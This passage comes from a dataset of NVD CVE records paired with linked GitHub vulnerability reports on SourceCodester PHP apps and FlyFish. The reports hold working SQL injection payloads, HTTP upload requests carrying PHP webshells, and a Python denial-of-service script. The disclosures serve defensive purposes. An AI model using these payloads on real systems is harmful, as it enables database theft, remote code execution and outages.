"UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/28" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264480" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264480" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.333960" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264480" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264480" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.333960" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mayurik:best_courier_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "6D0B90AE-6DFA-40B1-A97C-B445F29F3EB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CveSecLook/cve/issues/28
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Best courier management system project in php view_parcel.php V1.0 SQL injection vulnerability # NAME OF AFFECTED PRODUCT(S) + Best courier management system project in php ## Vendor Homepage + https://www.sourcecodester.com/php/16848/best-courier-management-system-project-php.html#google_vignette # AFFECTED AND/OR FIXED VERSION(S) ## submitter + zebra11 ## Vulnerable File + view_parcel.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/mayuri_k/gaatitrack%20by%20mayurik.com_.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + The PHP method uses methods located in view_parcel The $_Variable element on line 5 of the PHP file receives and dynamically executes user controlled code. This allows attackers to cause SQL injection attacks. + ![2](https://github.com/CveSecLook/cve/assets/92671097/8600ff1d-00fc-41af-8e6c-0074c85f9bab) ## Impact + Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained. # DESCRIPTION + zebra11 has discovered that due to insufficient protection of the "id" parameter in the "\view_parcel.php" file, "Best courier management system project in php" there is a serious security vulnerability in the This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database. ## Payload + id=-2335 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x5459775a625a654e4d6a50435668707175737a566d67536c575843784c6465767a414745614a4762,0x7176767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - ``` --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 9437=9437 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1 OR (SELECT 9560 FROM(SELECT COUNT(*),CONCAT(0x7178786271,(SELECT (ELT(9560=9560,1))),0x7176767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1 AND (SELECT 2546 FROM (SELECT(SLEEP(5)))smmA) Type: UNION query Title: Generic UNION query (NULL) - 18 columns Payload: id=-2335 UNION ALL SELECT NULL,CONCAT(0x7178786271,0x5459775a625a654e4d6a50435668707175737a566d67536c575843784c6465767a414745614a4762,0x7176767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- ``` + This is showing the payload implemented by running sqlmap + ![4](https://github.com/CveSecLook/cve/assets/92671097/b409a371-0faa-4c77-b9a8-0197095cecff) + The following is the database name displayed as a successful implementation of the attack by running sqlmap + ![1](https://github.com/CveSecLook/cve/assets/92671097/94b76660-f17c-4d3c-8d22-029cb457d1b9)
SourceCodester Best courier management system project in php view_parcel.php V1.0 SQL injection vulnerability
https://api.github.com/repos/CveSecLook/cve/issues/28/comments
0
2024-05-14T14:55:17Z
2024-05-15T02:18:44Z
https://github.com/CveSecLook/cve/issues/28
2,295,712,099
28
6,023
CVE-2024-4946
2024-05-16T06:15:13.547
A vulnerability was found in SourceCodester Online Art Gallery Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file admin/adminHome.php. The manipulation of the argument sliderpic leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264481 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/29" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264481" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264481" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.334215" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/29" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264481" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264481" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.334215" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:donbermoy:online_art_gallery_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "DB5104A2-50A5-41E1-8D7F-812A138D0D06", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/CveSecLook/cve/issues/29
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Online Art Gallery Management System Project using PHP/MySQL 1.0 admin/adminHome.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Online Art Gallery Management System Project using PHP/MySQL ## Vendor Homepage + https://www.sourcecodester.com/php/14211/online-art-gallery-management-system-project-using-phpmysql.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + zebra11 ## Vulnerable File + admin/adminHome.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlineartgallery.zip # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + The input obtained from line 37 of the "admin/adminHome.php" file is used in line 39 of the "admin/adminHome.php" file to determine the location of the file to be written, which may allow attackers to change or damage the content of the file, or create a brand new file. + ![1](https://github.com/CveSecLook/cve/assets/148504790/1edbe601-9de3-45dc-8be9-4766b4a15b0a) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE. # DESCRIPTION + zebra11 found that the file upload operation was triggered in admin/adminHome.php![alt text](image.png), and the _FAILES variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE. # Vulnerability details and POC ## Payload + The picture I uploaded here is a photo of carrying a Trojan horse, but due to character confusion, I took a screenshot directly. + ![2](https://github.com/CveSecLook/cve/assets/148504790/57e294ac-963c-42a0-a814-79acc8fd5d63) ``` POST /admin/adminHome.php HTTP/1.1 Host: 192.168.31.212:8112 Content-Length: 411 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.31.212:8112 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeU9BPA4FgayRwx5r User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.31.212:8112/admin/adminHome.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=4tbj4irii9kpe3h2lri2354256 Connection: close ------WebKitFormBoundaryeU9BPA4FgayRwx5r Content-Disposition: form-data; name="img_id" ------WebKitFormBoundaryeU9BPA4FgayRwx5r Content-Disposition: form-data; name="sliderpic"; filename="rce.php" Content-Type: image/jpeg <?php system("ipconfig"); ?> ------WebKitFormBoundaryeU9BPA4FgayRwx5r Content-Disposition: form-data; name="sliderPicSubmit" ------WebKitFormBoundaryeU9BPA4FgayRwx5r-- ``` ## Burp screenshot + ![3](https://github.com/CveSecLook/cve/assets/148504790/7d4d278d-18a9-4362-9774-2744eba6a788) ## Upload file name change, rule is to add a "Slider" before the original name + ![4](https://github.com/CveSecLook/cve/assets/148504790/550d23c4-fdd7-4f9d-8e49-c9798d247c56) ## I successfully executed the PHP script on the terminal + ![5](https://github.com/CveSecLook/cve/assets/148504790/497df148-18c3-469e-8b35-140a9685f94a)
SourceCodester Online Art Gallery Management System Project using PHP/MySQL 1.0 admin/adminHome.php Unrestricted Upload
https://api.github.com/repos/CveSecLook/cve/issues/29/comments
0
2024-05-14T15:41:58Z
2024-05-14T15:41:59Z
https://github.com/CveSecLook/cve/issues/29
2,295,816,357
29
6,024
CVE-2024-4966
2024-05-16T08:15:39.317
A vulnerability was found in SourceCodester SchoolWebTech 1.0. It has been classified as critical. Affected is an unknown function of the file /improve/home.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-264534 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/30" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264534" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264534" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.334216" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CveSecLook/cve/issues/30" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.264534" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.264534" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.334216" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sinamjackson:schoolwebtech:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA9F74E9-7B76-4ABC-8E25-9525AC85DB93", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/CveSecLook/cve/issues/30
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester SchoolWebTech 1.0 /improve/home.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + SchoolWebTech ## Vendor Homepage + https://www.sourcecodester.com/php/6638/school-web-tech.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + zebra11 ## Vulnerable File + /improve/home.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/Bigs%20Jackson%20Sinam/newschool.zip # PROBLEM TYPE ## Vulnerability Type + File upload ## Root Cause + The input obtained through PHP in line 375 of the \ improve \ home.php file is used by PHP in line 375 to determine the location of the file to be written, which may allow attackers to modify or damage the content of the file, or create a brand new file. + ![3](https://github.com/CveSecLook/cve/assets/92671097/893c8586-1dd6-4797-840b-1d641fcfbfef) ## Impact + Attackers can exploit this vulnerability for unrestricted uploads, and remote attacks may result in RCE. # DESCRIPTION + zebra11 found that the file upload operation was triggered in /improve/home.php, and the _FAILE variable was used to receive the payload. After receiving the attack vector from a remote attacker, it will result in unrestricted uploads, and remote attacks may lead to RCE. # Vulnerability details and POC ## Payload + This attack payload can be used without the need for login. + ![2](https://github.com/CveSecLook/cve/assets/92671097/a556f72f-1ddd-4433-8cd3-5b77af4252c1) ``` POST /improve/home.php?action=upload HTTP/1.1 Host: www.newschool.com:8126 Content-Length: 401 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://www.newschool.com:8126 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPfsdD8ejAA2Ivepk User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://www.newschool.com:8126/improve/home.php?action=upload Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryPfsdD8ejAA2Ivepk Content-Disposition: form-data; name="owner" ------WebKitFormBoundaryPfsdD8ejAA2Ivepk Content-Disposition: form-data; name="image"; filename="rce.php" Content-Type: image/jpeg <?php eval($_POST[cc123]) ?> ------WebKitFormBoundaryPfsdD8ejAA2Ivepk Content-Disposition: form-data; name="submit" Upload ------WebKitFormBoundaryPfsdD8ejAA2Ivepk-- ``` + Successfully connected using the tool and executed the ipconfig command + ![1](https://github.com/CveSecLook/cve/assets/92671097/687e97d0-ea5f-4198-9488-2f8d61951595)
SourceCodester SchoolWebTech 1.0 /improve/home.php Unrestricted Upload
https://api.github.com/repos/CveSecLook/cve/issues/30/comments
0
2024-05-14T15:45:21Z
2024-05-14T15:45:21Z
https://github.com/CveSecLook/cve/issues/30
2,295,823,794
30
6,025
CVE-2024-34905
2024-05-16T15:15:47.887
FlyFish v3.0.0 was discovered to contain a buffer overflow via the password parameter on the login page. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CloudWise-OpenSource/FlyFish/issues/191" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CloudWise-OpenSource/FlyFish/issues/191" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cloudwise:flyfish:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "46E15E56-7CF6-466D-83E9-E41842D6780E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/CloudWise-OpenSource/FlyFish/issues/191
[ "Exploit", "Third Party Advisory" ]
github.com
[ "CloudWise-OpenSource", "FlyFish" ]
**1. testing environment** The testing environment is VMware Workstation: Seed Ubuntu 20.04 **The version is as follows:** ![1](https://github.com/CloudWise-OpenSource/FlyFish/assets/105532049/40c3d7a1-0888-44f5-8d55-ba0c867616e2) **2. The vulnerability involves program code location and version number** **Vulnerability code location:** ./fly-fish-master/dataplatform/flyfishServer/src/main/java/.../lcap/controller/BaseUserController.Java **Test version:** Flyfish open source version **3. Detailed report** When capturing program login, registration, and other password design operations, we found that the client directly transmitted sensitive information such as usernames and passwords in plaintext, and operated on these information without restrictions. In the file ./fly-fish-master/dataplatform/flyfishServer/src/main/java/.../lcap/controller/BaseUserController.java includes functions for login, registration, and password modification. ![2](https://github.com/CloudWise-OpenSource/FlyFish/assets/105532049/8a84d4f1-5e3a-4389-885c-a4dd669e29c8) ![3](https://github.com/CloudWise-OpenSource/FlyFish/assets/105532049/46370a10-ee89-40e2-b1e8-0c4fced1a9e7) Taking the login function as an example, it does not review some basic information and directly encrypts the transmitted password with MD5 encryption and compares it with database entries, but does not impose a maximum length limit on the password. Regardless of whether the incoming password is in plaintext or ciphertext form, attackers can construct packets and fill them with excessively long passwords. In the program's view, this long string is a password related field, forcing the system to perform the password hash process of long passwords, causing the server CPU and memory to run out, resulting in a denial of service attack on the server. This may cause the website to crash for a long time, meaning it is unusable or unresponsive. **4. POC** 4.1 Environmental construction We use Docker to build the program. First, download the docker-compose.yml file from the Gitee community, and then execute the sudo docker-compose up -d command to build the environment. 4.2 Code logic We use Python language to simulate random long passwords by generating random long strings. Then, we sequentially send short and long passwords to the server to prove that the program's response time is normal. Long passwords are used to verify the existence of denial of service attacks in the program. While sending long passwords, we also log in to the correct account in the browser to verify that this attack did indeed cause server downtime. Please refer to the video for the browser login test. The video first shows the normal login time, and then simulates a denial of service attack. As the long password is transmitted, the server's CUP and memory gradually run out, and the user login time gradually increases until it crashes. In Attack_video, we simulated the login time extension caused by a longer password. And, we continued to increase the password length and demonstrated the scenario of the program not responding. 4.3 POC code The headers field in the code is the field obtained from the HTTP request packet during normal login using Wireshark packet capture. ``` import requests url = "http://127.0.0.1:8089/#/flyfish/login" headers = {"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64;rv:125.0) Gecko/20100101 Firefox/125.0","Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type":"applicationjson/json","Origin": "http://127.0.0.1:8089","Connection": "keep-alive", "Referer":"http://127.0.0.1:8089/"} for i in [100,10000,20000,30000,40000,45000,80000]: passwd = "1574598741" * i * 1000 data = {"name": "admin", "pass": f"{passwd}",} r = requests.post(url , headers=headers, data=data,timeout=999) print(f"密码长度:{i} 万") print("响应时间:",r.elapsed.total_seconds()) print("-"*20) ``` 4.4 POC results It can be seen that as the password length increases, the time for the server to process response requests also increases. Therefore, it can be seen that as long as the password is long enough, the server will also go down for a long time. The testing situation can be seen in the video. In Attack_video, we simulated the extension of login time caused by a longer password, and continued to increase the password length and demonstrated the scenario of the program not responding. ![4](https://github.com/CloudWise-OpenSource/FlyFish/assets/105532049/631b48a7-f2e1-4dee-a334-dfded320b72a) **5. Repair plan** One possible fix is to limit the length of input data within the frontend input box, while another possible fix is to add a maximum password length limit in BaseUserController or in login functions, registration functions, and other functions that involve password operations. In short, as long as the maximum length of the password is limited, this problem can be solved. ![1](https://github.com/CloudWise-OpenSource/FlyFish/assets/105532049/2ae595b4-7c47-436c-b83f-9cf36fe2364a) ![2](https://github.com/CloudWise-OpenSource/FlyFish/assets/105532049/6231158c-7b30-4bc2-a097-b8385db23554)
Flyfish has a DDoS vulnerability
